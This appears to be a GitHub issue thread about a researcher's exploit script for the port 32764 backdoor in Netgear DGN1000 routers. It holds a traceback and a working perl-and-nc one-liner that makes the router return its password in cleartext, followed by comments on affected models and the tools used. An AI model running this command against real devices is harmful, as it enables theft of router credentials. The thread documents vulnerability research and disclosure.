DGN1000

Question

DGN1000

grigio opened this issue 11 years ago · 6 comments

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764

I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.

Answer 1 · 2014-01-02T14:03:02.000Z

I should have add a little loop and check the length of the returned string :)
I'll update the script. Thank you for reporting the issue.

Answer 2 · 2014-01-02T22:52:48.000Z

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?

Answer 3 · 2014-01-02T22:58:13.000Z

Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

Answer 4 · 2014-01-03T13:56:52.000Z

@elvanderb I forgot to ask, do you raccommed other alternative firmwares without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported

Answer 5 · 2014-01-03T14:42:23.000Z

No, sorry :)

Answer 6 · 2014-01-03T16:43:32.000Z

Update: The DGN1000B is the firmware for countries which use Annex B (eg. Germany) for DSL.